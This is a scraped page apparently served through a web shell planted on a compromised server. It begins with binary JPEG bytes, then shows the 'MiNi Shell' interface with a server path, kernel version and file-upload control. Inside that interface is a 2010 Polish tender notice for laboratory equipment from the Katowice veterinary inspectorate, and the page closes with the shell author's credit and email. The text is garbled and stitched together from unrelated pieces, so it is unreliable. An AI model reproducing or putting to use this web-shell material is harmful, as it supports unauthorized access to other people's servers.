JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101115/367784-N-2010.html

<p class="kh_header"><b>Katowice: Dostawa i montaż urządzeń laboratoryjnych.</b><br>
<b>Numer ogłoszenia: 367784 - 2010; data zamieszczenia: 15.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wojewódzki Inspektorat Weterynarii w Katowicach , ul. Brynowska 25 A, 40-585 Katowice, woj. śląskie, tel. 032 6091618, 6091601, faks 032 6091618.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.katowice.wiw.gov.pl, http://bip.katowice.wiw.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa i montaż urządzeń laboratoryjnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest dostawa i montaż urządzeń laboratoryjnych.
2.	Zamawiający przedmiot zamówienia podzielił na  5  Pakietów:
dla Pracowni Patologii i Bakteriologii
PAKIET 1 - Wytrząsarka do probówek REAX control - 1 szt.
PAKIET 2 -Waga elektroniczna - 1 szt.
PAKIET 3- Łaźnia wodna - 1 zestaw
dla Pracowni MS
PAKIET 4 - Urządzenie do rozlewu podłoży na płytki i do probówek - 1 zestaw.
dla Pracowni Serologii
PAKIET 5 - Wytrząsarka typu Titramax 101 lub równoważna - 1 szt.
3.	Zamawiający dopuszcza składanie ofert częściowych na wybrany Pakiet.
4.	Szczegółowy opis przedmiotu zamówienia /Pakietów/ Zamawiający zawarł         w załączniku nr 2 do  SIWZ.
5. Wymagany  termin realizacji przedmiotu zamówienia do  22 grudnia 2010 r..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 42.94.30.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 22.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2.	Wysokość wadium: 
PAKIET 1 -13,00 PLN /słownie: trzynaście złotych /
PAKIET 2 -74,00 PLN /słownie: siedemdziesiąt cztery złote/
PAKIET 3 - 135,00 PLN / słownie: sto trzydzieści pięć złotych/
PAKIET 4 - 2.238,00 PLN / słownie: dwa tysiące dwieście trzydzieści osiem złotych/ 
PAKIET 5 - 98,00 PLN / słownie: dziewięćdziesiąt osiem złotych/ 
WADIUM RAZEM:      2.558,00 PLN
/ słownie:  dwa tysiące pięćset pięćdziesiąt osiem złotych/.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu nastąpi  w oparciu  o złożone dokumenty i oświadczenia Wykonawcy, wymagane w Rozdziale I w specyfikacji istotnych warunków zamówienia wg formuły spełnia/ nie spełnia tj. 
1)	W celu oceny spełnienia warunku udziału w postępowaniu Zamawiający wymaga, aby Wykonawca złożył oświadczenie /załącznik nr 4 do SIWZ/, że spełnia warunki określone w art. 22 ust. 1 ustawy Prawo zamówień publicznych, czyli warunki dotyczące: posiadania uprawnień do wykonywania działalności będącej przedmiotem zamówienia,
2)	posiadania wiedzy i doświadczenia do wykonania dostawy będącej przedmiotem zamówienia,
3)	dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, 
4)	 sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia 

2)	Wykonawca zgodnie z art. 26 ust. 2b ustawy może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia (np konsorcjum, spółka cywilna),ustanawiając pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (do oferty należy załączyć odpowiednie pełnomocnictwo). W takim przypadku warunki udziału w postępowaniu, dotyczące wykonawcy, odnoszą się odpowiednio do wykonawców, którzy ubiegają się wspólnie o zamówienie publiczne.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Katalog lub płytę CD oferowanego sprzętu - ze wskazaniem numeru katalogowego, z którego jednoznacznie będzie wynikać, że oferowane przez Wykonawcę urządzenie spełnia wymagania Zamawiającego określone w SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>urzędowa zmiana stawki podatku VAT oferowanego przedmiotu zamówienia</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> witryna www: http:// bip.katowice.wiw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba Zamawiającego - pokój 010.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.11.2010 godzina 11:00, miejsce: 1Oferty należy składać n dnia 23-11-2010 r. do godz. 11.00 w siedzibie Zamawiającego - sekretariat pokój 50..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wytrząsarka do próbówek REAX control - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	- wyposażona w przełącznik do pracy ciągłej i przerywanej
2.	- wyposażona w płytę do probówek/naczyń o średnicy do 20  mm
3.	- posiadającą dodatkowe akcesoria w postaci płyty na kolby o maks. pojemności do 50 ml.
4.	- specjalna konstrukcja wytrząsarki zapobiegająca wnikaniu rozbryzganej cieczy do wnętrza  
5.	urządzenia.
6.	- stałe wytrząsanie przy różnym obciążeniu 
7.	Dane techniczne:

	Model 	REAX control 
	Ruch 	kołowy, wibracyjny 
	Częstotliwość wytrząsania 	0 do 2500 min-1 
	Orbita 	5 mm 
	Dokładność regulacji 	?2 %
	Ustawienia prędkości	kontr. elektron.
	Moc wejściowa 	42 W 
	Zasilanie	230V / 50 Hz
	Masa 	3300 g 
	Wymiary (szer. x gł. x wys.) 	134 x 172 x 105 mm 
	Klasa ochrony 	IP 22 
	Warunki otoczenia 	+5 do + 40 °C przy 85 % rh.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.43.65.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> waga  elektroniczna - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Typ: PS 1500/X
2.	Obciążenie maksymalne: 1500 g
3.	Obciążenie minimalne: 0,5 g
4.	Dokładność odczytu: 0,01 g
5.	Zakres tarowania: -1500 g
6.	Liniowość: ?0,02 g
7.	Powtarzalność: 0,01 g
8.	Temperatura stosowania: + 15 °C - + 30 °C
9.	Klasa dokładności: II
10.	Szalka: 195 x 195 mm
11.	Czas stabilizacji 1,5 s
12.	Zasilanie: 230 V, 50 Hz/11 V AC 380 mA
13.	Kalibracja: wewnętrzna (automatyczna)
14.	Wyświetlacz: graficzny (z podświetleniem)
15.	Świadectwo legalizacji.
16.	Interfejs  RS232
17.	Masa netto / brutto: 5/7,1 kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.31.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Łaźnia wodna - 1 zestaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	mikroprocesorowa regulacja temperatury w zakresie od ok. 5 °C powyżej temperatury otoczenia do 99,9 °C, 
2.	elektroniczna kontrola regulatora temperatury, w przypadku wystąpienia awarii wyświetlany jest odpowiedni kod błędu
3.	jednorodność temperatury (czasowa) ?0,1 °C
4.	szybkie nagrzewanie
5.	możliwość przekroczenia nastawionej temperatury jest redukowana do minimum
6.	cyfrowa nastawa i wyświetlanie temperatury z dokładnością do 0,1 °C
7.	miękka klawiatura dotykowa z graficznym oznaczeniem
8.	wyłączenie grzania przy zbyt niskim poziomie wody dla ochrony elementu grzejnego
9.	zawór drenowy z tyłu łaźni, element grzejny, wnętrze łaźni, pokrywa i wszystkie części mające kontakt z wodą wykonane ze stali nierdzewnej
10.	podnoszona, izolowana termicznie pokrywa z wewnętrzną wypukłością zabezpieczająca przed wlaniem skroplin do probówek
11.	obudowa wykonana z galwanizowanej elektrolitycznie blachy stalowej malowanej proszkowo
12.	urządzenie posiadające znak bezpieczeństwa (GS)
13.	w standardzie z pokrywą oraz perforowaną tacą
14.	wymiary wew.(szer.x gł.x wys.): 400x245x145mm
15.	wymiary zew.(szer.x gł.x wys.): 485x440x315mm
16.	poj. łaźni: 14l
17.	moc: 1500W
18.	zasilanie (50/60Hz): 230V
19.	waga netto: 12kg

Wyposażenie dodatkowe:
20.	Stelaż na probówki 20 miejsc, średnica 18 mm dla probówek 16/17 mm-3 szt 
21.	Stelaż na probówki 5 miejsc, średnica 31 mm-5 szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 42.00.00.00-6, 42.94.30.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Urządzenie do rozlewu podłoży na płytki  i do próbówek - 1 zestaw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.umożliwiające sterylne rozlewanie płynów i podłoży agarowych
2.	wyposażone w pompę perystaltyczną, która precyzyjnie dozuje odpowiednią ilość płynu lub podłoża agarowego
3.	wyposażone w elektroniczny sposób prowadzenia płytek Petriego
4.	wyposażone w sterylną komorę z lampą UV
5.	wyposażone w ruchome statywy (karuzele służące od rozlewania podłoży na płytki Petriego 
o różnych wymiarach lub do probówek.) montowane do urządzenia opcjonalnie
6.	umożliwiające równomierne rozprowadzenie warstwy pożywki agarowej na całej powierzchni płytki
7.	z możliwością natychmiastowego schłodzenia podłoża po rozlaniu na płytkę, co powoduje szybkie żelowanie agaru
8.	z możliwością połączenia z drukarką, która nanosi odpowiednie informacje na każdą 
z płytek.
9.	o wymiarach umożliwiają umieszczenie urządzenia na zwykłym stole laboratoryjnym (655mm x 634mm x 330mm)
10.	o parametrach pracy: 
zakres dozowania: 1-99ml
dokładność: około 1% (dla dawki 15ml)
wydajność: 500ml/min
szybkość napełniania płytek: do 900szt./godz (przy dawce 15ml/płytkę)
maksymalna ilość płytek na statywie: 540 szt
11.	wyposażone w adaptery:
 zestaw adaptacyjny do napełniania płytek Petriego O 90 mm 
 karuzela na 360 płytek Petriego O 90 mm 
 rotor do płytek Petriego O 90 mm.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wytrząsarka TYPU Titramax 101 lub równoważna - 1 szt..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Wytrząsarka przeznaczona dla 4 mikropłytek. 
2.	Urządzenie wykonuje ruch obrotowo-wibrujący o amplitudzie wytrząsania 3 mm. 
3.	Cechy:
bezstopniowy analogowy potencjometr
timer do 120 minut
amplituda 3 mm umożliwiająca bardzo wydajne i efektywne mieszanie
4.	Dane techniczne
parametry 	Np. Titramax 101 
wymiary platformy [mm] 	220 x 220 
prędkość [obr/min] 	od 150 do 1350 
amplituda wychylenia [mm] 	3 
tryb pracy 	1 - 120 min / praca ciągła 
zasilanie [V, Hz] 	230, 50 
klasa ochronności IP 	30 
moc [W] 	15 
wymiary zewn. (szer. x głęb. x wys.) [mm] 	245 x 125 x 310 
ciężar [kg] 	5,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 38.00.00.00-5, 38.43.65.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 22.12.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com